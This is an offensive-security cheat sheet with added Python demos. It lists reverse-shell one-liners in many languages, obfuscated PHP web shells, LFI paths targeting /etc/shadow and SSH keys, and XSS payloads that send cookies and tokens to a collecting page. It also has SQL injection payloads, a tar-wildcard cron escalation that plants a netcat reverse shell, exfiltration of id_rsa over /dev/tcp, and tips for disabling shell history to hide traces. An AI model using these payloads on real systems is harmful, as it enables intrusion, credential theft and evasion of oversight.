saltzer/cheat-sheet


Reverse shell

TTY Spawn Shell

PHP Reverse Shell

LFI

XSS

SQL Injection Payloads

Useful Linux command

File Transfer

Traces of stay in the system


Reverse shell > Bash

Replace 127.0.0.1 and 1234 in the payloads below with the address and port of your listener (for example nc -lnvp 1234 on the attacker machine).

bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1234 <&1'

Reverse shell > Python

python -c 'import socket,os,pty;s=socket.socket();s.connect(("127.0.0.1",1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Reverse shell > Netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 1234 >/tmp/f

Reverse shell > PHP

php -r '$sock=fsockopen("127.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Reverse shell > Telnet

TF=$(mktemp -u); mkfifo $TF && telnet 127.0.0.1 1234 0<$TF | /bin/sh 1>$TF

Reverse shell > Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("127.0.0.1",1234);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Reverse shell > Perl

perl -e 'use Socket;$i="127.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
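Added example, not code from the cheat sheet: both ends of a reverse shell on loopback, so the mechanics of the one-liners above can be watched in one process. A listener stands in for nc -lnvp, a second interpreter runs the same connect-then-dup2 payload with the callback address filled in as literals, and one command is pushed through the remote shell. The marker command, the loopback addresses and the helper names are this example's own.

```python
import socket
import subprocess
import sys

# Added example, not code from the cheat sheet. Both ends of a reverse shell
# on loopback: a listener standing in for `nc -lnvp PORT`, and a "victim"
# interpreter running the connect-back payload. The marker command below is
# constructed for the demo.

def reverse_shell_payload(host, port):
    """Python source equivalent to the one-liner above, with the callback
    address as literals. Non-interactive /bin/sh keeps the captured output
    free of prompts; swap in pty.spawn("/bin/sh") for an interactive one."""
    return (
        "import socket,os;"
        f"s=socket.socket();s.connect(({host!r},{port}));"
        "[os.dup2(s.fileno(),fd) for fd in (0,1,2)];"
        'os.execv("/bin/sh",["/bin/sh"])'
    )

def catch_reverse_shell(command="echo reverse-shell-ok", timeout=10):
    """Attacker side: listen, accept the callback, send one command followed
    by `exit`, and return everything the remote shell wrote back."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))          # ephemeral port, no clashes
    listener.listen(1)
    listener.settimeout(timeout)
    port = listener.getsockname()[1]

    # The "victim": a second interpreter that connects back to us.
    victim = subprocess.Popen(
        [sys.executable, "-c", reverse_shell_payload("127.0.0.1", port)],
        stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    output = b""
    try:
        conn, _ = listener.accept()
        with conn:
            conn.settimeout(timeout)
            conn.sendall(f"{command}\nexit\n".encode())
            while True:
                chunk = conn.recv(4096)
                if not chunk:                 # shell exited; its fds closed
                    break
                output += chunk
    finally:
        listener.close()
        victim.wait(timeout=timeout)
    return output.decode(errors="replace")

if __name__ == "__main__":
    print(catch_reverse_shell(), end="")
```

The payload's three dup2 calls are the whole trick: once fd 0, 1 and 2 point at the socket, any program exec'd afterwards reads commands from and writes results to the network without knowing it. The page's getenv("127.0.0.1") variants come from a template where the address was an environment-variable name; with the literal IP left in they look up a variable that does not exist, which is why the literals are used here.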

TTY Spawn Shell > Python spawn shell

python -c 'import pty; pty.spawn("/bin/sh")'

TTY Spawn Shell > OS system spawn shell

import os; os.system("/bin/bash")   (typed at an interactive Python prompt)

TTY Spawn Shell > Bash spawn shell

/bin/sh -i

TTY Spawn Shell > Perl spawn shell

perl -e 'exec "/bin/sh";'

TTY Spawn Shell > Ruby spawn shell

ruby -e 'exec "/bin/sh"'

TTY Spawn Shell > Lua spawn shell

lua -e 'os.execute("/bin/sh")'

TTY Spawn Shell > IRB spawn shell

exec "/bin/sh"

TTY Spawn Shell > VI spawn shell

:!bash

TTY Spawn Shell > VI(2) spawn shell

:set shell=/bin/bash:shell

TTY Spawn Shell > Nmap spawn shell

nmap --interactive   (older nmap releases only)
!sh
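Added example, not from the cheat sheet: why the spawn tricks above are needed at all. The same probe is run once behind pipes, which is what a netcat reverse shell gives you, and once under a pseudo-terminal allocated the way pty.spawn("/bin/sh") does it. su, sudo, ssh, passwd and most editors make exactly this check before they will talk to you. The probe command and the function names are constructed for this example.

```python
import os
import pty
import subprocess

# Added example, not from the cheat sheet. The same probe is run once behind
# pipes (what a netcat reverse shell gives you) and once under a
# pseudo-terminal (what `python -c 'import pty; pty.spawn("/bin/sh")'`
# gives you). The probe command is constructed here.

PROBE = ["/bin/sh", "-c", "if [ -t 0 ]; then echo has-tty; else echo no-tty; fi"]

def run_through_pipe(argv):
    """stdin/stdout are pipes (stdin is /dev/null here), no terminal at all."""
    done = subprocess.run(argv, stdin=subprocess.DEVNULL,
                          capture_output=True, text=True)
    return done.stdout.strip()

def run_through_pty(argv):
    """Fork with a fresh pty, exec the command on the slave side and read its
    output from the master side, which is what pty.spawn() does internally."""
    pid, master_fd = pty.fork()
    if pid == 0:                      # child: fds 0/1/2 are the pty slave
        try:
            os.execvp(argv[0], argv)
        finally:
            os._exit(127)             # only reached if exec failed
    output = b""
    while True:
        try:
            chunk = os.read(master_fd, 1024)
        except OSError:               # Linux reports child EOF on a pty as EIO
            break
        if not chunk:
            break
        output += chunk
    os.close(master_fd)
    os.waitpid(pid, 0)
    # The pty line discipline rewrites "\n" as "\r\n"; undo that.
    return output.decode().replace("\r\n", "\n").strip()

if __name__ == "__main__":
    print("through pipes:", run_through_pipe(PROBE))
    print("through a pty:", run_through_pty(PROBE))
```

The pty path is also what gives you job control, tab completion and a working Ctrl-C once you follow it with stty raw -echo on the attacker side and reset on the target.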

PHP Reverse Shell > RCE

<?php system($_GET["cmd"]); ?>

PHP Reverse Shell > Obfuscate PHP Web Shell

<?=`$_GET[0]`?>
Example: http://site.com/path/to/shell.php?0=command
<?=`$_POST[0]`?>
Example: curl -X POST http://site.com/path/to/shell.php -d "0=command"
<?=`{$_REQUEST['_']}`?>
Example: http://site.com/path/to/shell.php?_=command
Example: curl -X POST http://site.com/path/to/shell.php -d "_=command"
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
Example: http://site.com/path/to/shell.php?0=command (the XOR expressions resolve to $_GET['0'], which is then run in backticks)
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
Example: http://site.com/path/to/shell.php?_=function&__=argument (resolves to $_GET['_']($_GET['__']))
http://site.com/path/to/shell.php?_=system&__=ls
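Added example, not part of the cheat sheet: the two XOR-obfuscated shells above resolved by reproducing PHP's string XOR in Python, which is the check you want when triaging a suspicious <?= ... ?> fragment found on a server. The expression values are copied from the payloads above; the helper names and the PHP-semantics notes are this example's own.

```python
# Added example, not from the cheat sheet: resolve the two XOR-obfuscated
# shells above by reproducing PHP's string XOR in Python. The constants are
# copied from the payloads; everything else is this script's own.

def php_xor(a: str, b: str) -> str:
    """PHP's `$a ^ $b` on strings: byte-wise XOR, truncated to the shorter
    operand (which is why ($_^">;") contributes only one character)."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))

def decode_shell_one():
    """<?=$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1)))
          .($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));
       $_=${$_}['_'^'o'];echo`$_`?>
    Returns (superglobal name, array key)."""
    key = "'"
    # PHP: ord(1==1) is ord(true); true is cast to the string "1", so 49.
    parts = [
        chr(4 * 4 * (5 + 5) - 40),      # 'x'
        chr(47 + ord("1")),             # '`'
        chr(ord("_") + 3),              # 'b'
        chr((10 * 10) + (5 * 3)),       # 's'
    ]
    superglobal = "".join(php_xor(key, p) for p in parts)   # ${$_} looks this up
    index = php_xor("_", "o")                               # '_'^'o'
    return superglobal, index

def decode_shell_two():
    """<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?>
       <?=${'_'.$_}['_'](${'_'.$_}['__']);?>
    Returns the superglobal name after '_' is prepended."""
    key = "{"
    name = "".join(php_xor(key, p) for p in ["<", ">;", "/"])
    return "_" + name

if __name__ == "__main__":
    sg, idx = decode_shell_one()
    print(f"shell one runs: echo `${sg}['{idx}']`")
    sg2 = decode_shell_two()
    print(f"shell two runs: {sg2}['_']({sg2}['__'])")
```

Neither shell contains the strings GET, system or eval, which is the whole point: signature-based scanners that grep for those names miss them, while a quick evaluation of the arithmetic gives the plaintext in seconds.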

PHP Reverse Shell > PHP Reverse Shell (Pentestmonkey)

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

LFI > Directory Traversal

some.php?file=../../../../../../../etc/passwd

LFI > PHP Wrapper expect://

example.php?page=expect://ls

expect:// gives direct command execution but is not available by default; it needs the PECL expect extension to be installed.

LFI > PHP Wrapper php://filter

example.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

The base64 filter returns the file's contents instead of executing them, so it also lets you read PHP source (resource=index.php) that a plain include would run.

LFI > Useful LFI files (Linux)

/etc/passwd

/etc/shadow

/etc/issue

/etc/group

/etc/hostname

/etc/ssh/ssh_config

/etc/ssh/sshd_config

/root/.ssh/id_rsa

/root/.ssh/authorized_keys

/home/user/.ssh/authorized_keys

/home/user/.ssh/id_rsa

/proc/[0-9]*/fd/[0-9]*

/proc/mounts

/home/$USER/.bash_history

/home/$USER/.ssh/id_rsa

/var/run/secrets/kubernetes.io/serviceaccount

/var/lib/mlocate/mlocate.db

/var/lib/mlocate.db

LFI > Useful LFI files (Apache)

/etc/apache2/apache2.conf

/usr/local/etc/apache2/httpd.conf

/etc/httpd/conf/httpd.conf

Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log

Debian/Ubuntu -> /var/log/apache2/access.log

FreeBSD -> /var/log/httpd-access.log

/var/log/apache/access.log

/var/log/apache/error.log

/var/log/apache2/access.log

/var/log/apache2/error.log

LFI > Useful LFI files (MySQL)

/var/lib/mysql/mysql/user.frm

/var/lib/mysql/mysql/user.MYD

/var/lib/mysql/mysql/user.MYI

LFI > Useful LFI files (Windows)

/boot.ini

/autoexec.bat

/windows/system32/drivers/etc/hosts

/windows/repair/SAM

/windows/panther/unattended.xml

/windows/panther/unattend/unattended.xml

/windows/system32/license.rtf

/windows/system32/eula.txt

XSS > Data grabber for XSS

To obtain the administrator's cookie or a sensitive access token, the following payloads send it to a page you control.
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>

<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>

<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>

<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
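Added example, not from the cheat sheet: a Python stand-in for the "controlled page" the payloads above point at (grabber.php / cookie.php). It records the c parameter of every GET and answers with a 1x1 GIF so that the new Image().src variant loads cleanly and leaves no broken image in the victim's page. The victim request, the cookie value and the function names are constructed here; no browser or real site is involved.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, quote, urlparse
from urllib.request import ProxyHandler, build_opener

# Added example, not from the cheat sheet: a stand-in for the attacker's
# "controlled page" (grabber.php / cookie.php above). The victim request and
# the cookie value below are constructed for the demo.

captured = []                      # one dict per exfiltrated value

class Grabber(BaseHTTPRequestHandler):
    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        for value in params.get("c", []):
            captured.append({"from": self.client_address[0],
                             "referer": self.headers.get("Referer"),
                             "data": value})
        # A 1x1 transparent GIF, so an <img> "loads" and the page stays clean.
        body = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
                b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01"
                b"\x00\x00\x02\x02D\x01\x00;")
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):    # keep the demo quiet
        pass

def start_grabber():
    """Serve on an ephemeral loopback port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), Grabber)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]

def simulate_victim(port, secret):
    """The single GET that `new Image().src='http://.../cookie.php?c='+
    document.cookie` makes the browser send. The payloads on the page do not
    URL-encode the value, so a raw '&' in the cookie can be cut off by the
    grabber's query parser; encodeURIComponent() in the payload avoids that,
    and quote() plays that role here."""
    url = f"http://127.0.0.1:{port}/cookie.php?c={quote(secret)}"
    opener = build_opener(ProxyHandler({}))   # ignore any http_proxy setting
    with opener.open(url, timeout=5) as resp:
        return resp.status, resp.headers.get("Content-Type")

def run_demo(secret="session=deadbeef; role=admin"):   # constructed cookie
    server, port = start_grabber()
    try:
        status, ctype = simulate_victim(port, secret)
    finally:
        server.shutdown()
        server.server_close()
    return status, ctype, [hit["data"] for hit in captured]

if __name__ == "__main__":
    print(run_demo())
```

The Referer header the browser adds tells you which page the payload fired on; the document.location variants above lose it when the victim is redirected, which is why the image-beacon form is usually preferred for quiet collection.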

XSS > Basic Payload

<script>alert('XSS')</script>

<scr<script>ipt>alert('XSS')</scr<script>ipt>

"><script>alert("XSS")</script>

"><script>alert(String.fromCharCode(88,83,83))</script>

XSS > Img tag payload

<img src=x onerror=alert('XSS');>

<img src=x onerror=alert('XSS')//
     
<img src=x onerror=alert(String.fromCharCode(88,83,83));>

<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

<img src=x:alert(alt) onerror=eval(src) alt=xss>

"><img src=x onerror=alert("XSS");>

"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

XSS > XSS in Markdown

[a](javascript:prompt(document.cookie))

[a](j a v a s c r i p t:prompt(document.cookie))

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

[a](javascript:window.onerror=alert;throw%201)

XSS > XSS in SVG

<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>

<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
 
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
 
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

XSS > Bypass word blacklist with code evaluation

eval('ale'+'rt(0)');

Function('ale'+'rt(1)')();

new Function`alert`6``;

setTimeout('ale'+'rt(2)');

setInterval('ale'+'rt(10)');

Set.constructor('ale'+'rt(13)')();

Set.constructor`alert(14)```;

SQL Injection Payloads > Generic SQL Injection

' or '

-- or #

' OR '1

' OR 1 -- -

OR "" = "

" OR 1 = 1 -- -"

' OR '' = '

'='

'LIKE'

'=0--+

OR 1=1

' OR 'x'='x

' AND id IS NULL; --

'''''''''''''UNION SELECT '2

SQL Injection Payloads > Time-Based

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

';WAITFOR DELAY '0:0:30'--

SQL Injection Payloads > Generic Error Based Payloads

OR 1=1

OR 1=1#

OR x=y#

OR 1=1--

OR x=x--

OR 3409=3409 AND ('pytW' LIKE 'pytW

HAVING 1=1

HAVING 1=1#

HAVING 1=0--

AND 1=1--

AND 1=1 AND '%'='

WHERE 1=1 AND 1=0--

%' AND 8310=8310 AND '%'='

SQL Injection Payloads > Authentication Based Payloads

' or ''-'

' or '' '

' or ''&'

' or ''^'

' or ''*'

or true--

" or true--

' or true--

") or true--

') or true--

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/

SQL Injection Payloads > Order by and UNION Based Payloads

1' ORDER BY 1--+

1' ORDER BY 2--+

1' ORDER BY 3--+

1' ORDER BY 1,2--+

1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+

1' GROUP BY 1,2,3--+

' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+

' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
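Added example, not from the cheat sheet: the authentication-bypass payloads from the sections above run against a constructed SQLite login table, with the string-built query next to its parameterised fix. The table, users, passwords and function names are invented for this example; the payload strings are the page's.

```python
import sqlite3

# Added example, not from the cheat sheet: authentication-bypass payloads
# from the sections above against a constructed SQLite login table. Table,
# users and passwords are invented here.

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "correct horse battery"), ("bob", "hunter2")])
    return db

def login_vulnerable(db, username, password):
    """User input is pasted into the SQL text, so quotes and comments in it
    change the query. Returns the matched username or None."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    """Same query with bound parameters: the payload is only ever compared as
    a string value, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# Payloads copied from the sections above, placed in the field they target.
CASES = [
    ("' OR 1 -- -", "anything"),           # username field: comment drops the password check
    ("admin", "' OR 'x'='x"),              # password field: tautology OR-ed onto the WHERE
    ("admin') or ('1'='1'--", "anything"), # wants a parenthesised query; here it just breaks
]

def try_payloads(db):
    """Run each case through both login functions. A syntax error from the
    vulnerable query is reported rather than raised: that error is the signal
    the "Generic Error Based Payloads" section is fishing for."""
    results = {}
    for user, pw in CASES:
        try:
            vuln = login_vulnerable(db, user, pw)
        except sqlite3.OperationalError as exc:
            vuln = f"SQL error: {exc}"
        results[(user, pw)] = (vuln, login_safe(db, user, pw))
    return results

if __name__ == "__main__":
    for case, (vuln, safe) in try_payloads(make_db()).items():
        print(f"{case!r:45} vulnerable -> {vuln!r:35} parameterised -> {safe!r}")
```

The third case is the practical lesson behind the long payload lists above: a payload only works when its quoting and bracketing match the query it lands in, so the first job is to find the shape of the query (usually from the error message) and only then pick the payload.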

Useful Linux command > SUID Commands

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

find / -type f -name '*.txt' 2>/dev/null

Useful Linux command > System Version

cat /etc/issue

cat /etc/*-release

cat /etc/lsb-release

cat /etc/redhat-release

Useful Linux command > Kernel Version

cat /proc/version

uname -a

uname -mrs

rpm -q kernel

dmesg | grep Linux

ls /boot | grep vmlinuz

Useful Linux command > Environment Variables

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout

env

set

Useful Linux command > Service Settings

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf

cat /etc/inetd.conf

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

Useful Linux command > Cron Jobs

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

Useful Linux command > Other Users

lsof -i

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig --list

chkconfig --list | grep 3:on

last

Useful Linux command > Port Forwarding

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port

ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
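Added example, not from the cheat sheet: a TCP port relay in Python that does what the mknod/nc backpipe lines above do (accept on one port, connect onward to the real service, copy bytes in both directions) including the tee-style capture of inflow and outflow. The echo service standing in for "localhost 80", the ephemeral ports, the payload and the function names are all constructed here.

```python
import socket
import threading

# Added example, not from the cheat sheet: a relay doing what the
# mknod/nc backpipe lines do, with tee-style capture of both directions.
# The echo service, ports and payload are constructed here.

def _listener():
    """Loopback listener on an ephemeral port (no hard-coded 8080/80)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s

def _pump(src, dst, log, direction):
    """Copy src -> dst until EOF, recording each chunk like `tee -a inflow`."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.append((direction, data))
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)   # pass the EOF along, keep reading
        except OSError:
            pass

def relay_one_connection(lsock, target, log):
    """Accept a single client on lsock and splice it to target=(host, port)."""
    client, _ = lsock.accept()
    upstream = socket.create_connection(target)
    inbound = threading.Thread(target=_pump, args=(client, upstream, log, "inflow"))
    inbound.start()
    _pump(upstream, client, log, "outflow")
    inbound.join()
    client.close()
    upstream.close()

def _echo_once(lsock):
    """Stand-in for the real service: echo whatever the one client sends."""
    conn, _ = lsock.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data)

def run_demo(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """client -> relay -> echo service -> relay -> client.
    Returns the reply the client saw and the relay's captured traffic."""
    svc, fwd = _listener(), _listener()
    log = []
    threading.Thread(target=_echo_once, args=(svc,), daemon=True).start()
    relay = threading.Thread(target=relay_one_connection,
                             args=(fwd, svc.getsockname(), log), daemon=True)
    relay.start()
    with socket.create_connection(fwd.getsockname(), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)            # we are done talking
        reply = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            reply += chunk
    relay.join(timeout=5)
    svc.close()
    fwd.close()
    return reply, log

if __name__ == "__main__":
    reply, log = run_demo()
    print(reply)
    for direction, data in log:
        print(direction, data)
```

The half-close (shutdown(SHUT_WR)) in each direction is what the single named pipe in the shell version cannot express cleanly, and it is the usual reason a netcat relay hangs on the last byte of a response.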

Useful Linux command > TAR Wildcard Cronjob Privilege Escalation

All three files must sit in the directory the cron job runs tar in (here /var/www/html, for a job such as cd /var/www/html && tar cf /tmp/backup.tar *): the shell expands * into the file names and GNU tar reads the two names that start with -- as options.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > /var/www/html/shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"
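Added example, not from the cheat sheet: the wildcard trick above replayed in a throw-away directory. The cron job is simulated by running the same tar cf ... * a careless job would, as the current user, and the injected checkpoint action touches a marker file instead of starting a reverse shell. The directories, file names and function names are this example's own; it needs GNU tar, since --checkpoint and --checkpoint-action are GNU extensions.

```python
import os
import shutil
import subprocess
import tempfile

# Added example, not from the cheat sheet: the wildcard trick replayed in a
# temporary directory with a marker file in place of the reverse shell.
# Needs GNU tar (--checkpoint and --checkpoint-action are GNU extensions).

def is_gnu_tar():
    try:
        out = subprocess.run(["tar", "--version"], capture_output=True, text=True)
    except FileNotFoundError:
        return False
    return "GNU tar" in out.stdout

def tar_wildcard_demo():
    """True if the injected --checkpoint-action ran, False if tar simply
    archived the files, None when GNU tar is not available."""
    if not is_gnu_tar():
        return None
    target = tempfile.mkdtemp(prefix="wwwroot-")   # stands in for /var/www/html
    backup = tempfile.mkdtemp(prefix="backup-")    # where the "cron job" writes
    marker = os.path.join(backup, "checkpoint-ran")
    try:
        # What the three commands on the page leave behind, with the reverse
        # shell replaced by a marker touch.
        with open(os.path.join(target, "shell.sh"), "w") as f:
            f.write(f"#!/bin/sh\ntouch '{marker}'\n")
        for name in ("--checkpoint-action=exec=sh shell.sh", "--checkpoint=1", "index.html"):
            open(os.path.join(target, name), "w").close()
        # The job: the shell expands * to the file names, GNU tar permutes its
        # argv, and the two names that begin with -- become options.
        subprocess.run(f"tar cf '{backup}/site.tar' *", shell=True, cwd=target,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
                       check=False)
        return os.path.exists(marker)
    finally:
        shutil.rmtree(target)
        shutil.rmtree(backup)

if __name__ == "__main__":
    verdict = {None: "GNU tar not found", True: "checkpoint action executed",
               False: "nothing executed"}
    print(verdict[tar_wildcard_demo()])
```

The fix on the defending side is the same in every wildcard case: end the option list before the glob (tar cf backup.tar -- *) or pass a directory instead of a wildcard (tar cf backup.tar .).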

File Transfer > Bash Upload

Upload a file over HTTP (requires an HTTP service listening on the attacker machine; the file content is sent as the body of a bare POST)
bash -c 'echo -e "POST / HTTP/0.9 $(<id_rsa)" > /dev/tcp/10.10.164.167/1337'
Exfiltrate a file over raw TCP: listen with netcat on port 1337 and redirect the output to a file, then push the file from the target
nc -l -p 1337 > data
bash -c 'cat id_rsa > /dev/tcp/10.10.164.167/1337'

File Transfer > Bash Download

Send via netcat
nc -l -p 1337 < id_rsa
Download file on the other machine
bash -c 'cat < /dev/tcp/10.10.164.167/1337 > id_rsa'

File Transfer > Netcat

Upload (attacker pushes a file to the target): start the listener on the target with output redirected to a file, then send from the attacker
nc -lnvp 1337 > file_saved
nc 10.10.164.167 1337 < id_rsa
Download (attacker pulls a file from the target): start the listener on the attacker, then send from the target
nc -lnvp 1337 > file_saved
nc 10.10.164.167 1337 < id_rsa

File Transfer > Python

Python3 HTTP Server
python3 -m http.server 1337
Python2 HTTP Server
python -m SimpleHTTPServer 1337

File Transfer > SCP

Upload from the local host to the remote computer (the port option comes before the paths; note that scp uses -P, not -p, for the port)
scp -P 1337 id_rsa username@10.10.164.167:~/destination
Download from the remote computer
scp -P 1337 user@10.10.164.167:~/path_to_file file_saved

Traces of stay in the system > Disable Saving Command History

Disable the shell variable HISTFILE at login (system-wide, needs root; the new file under /etc/profile.d is itself a trace)
echo "unset HISTFILE" | sudo tee /etc/profile.d/unset_histfile.sh
If necessary, also set HISTSIZE to 0 so that no commands are kept in memory for the session.
echo "HISTSIZE=0" | sudo tee /etc/profile.d/disable_histsize.sh
For the current shell only, without writing any file, run unset HISTFILE at the start of the session.

Traces of stay in the system > Linux Logs

binary files
/var/run/utmp -- current connections to the system
/var/log/wtmp -- history of connections to the system
/var/log/btmp -- failed login attempts
/var/log/lastlog -- users last login
text files
/var/log/auth.log -- user authentication information
/var/log/audit/audit.log -- access denial information
/var/log/messages -- message log
/var/log/security -- user authentication information
